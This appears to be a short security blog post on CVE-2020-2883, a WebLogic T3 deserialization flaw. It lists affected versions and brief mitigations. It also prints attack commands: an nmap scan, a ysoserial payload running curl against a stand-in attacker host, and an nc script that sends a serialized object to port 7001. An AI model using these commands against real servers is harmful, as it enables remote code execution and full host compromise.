Listen to this Post
How the mentioned CVE works: CVE-2020-2883 is a critical vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. The flaw exists within the T3 protocol, a proprietary protocol used for communication between WebLogic servers and Java clients. The vulnerability is easily exploitable and allows unauthenticated attackers with network access via T3 to compromise the server. The core of the issue is a deserialization flaw where untrusted data is insecurely deserialized. When a malicious serialized object is sent to a vulnerable WebLogic Server listening on the T3 port, the server deserializes the object without proper validation. This insecure deserialization process allows the attacker to execute arbitrary code on the underlying operating system with the privileges of the WebLogic server process, leading to a complete compromise of the host.
Platform: Oracle WebLogic Server
Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Vulnerability : Insecure Deserialization
Severity: Critical
date: 2020-04-15
Prediction: 2020-07-14
What Undercode Say:
`nmap -p 7001 –script weblogic-t3-info `
`java -jar ysoserial.jar CommonsCollections6 ‘curl undercode.attack/poc’ | base64`
`!/bin/bash
T3 protocol header
printf “t3 12.2.1\nAS:255\nHL:19\n\n” > payload.t3
Append serialized object
cat malicious_serialized_obj >> payload.t3
nc -nv target 7001 < payload.t3`
How Exploit:
Send malicious T3 object.
Protection from this CVE:
Apply Oracle CPU patches.
Restrict T3 protocol traffic.
Use network segmentation.
Impact:
Remote Code Execution.
Full system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

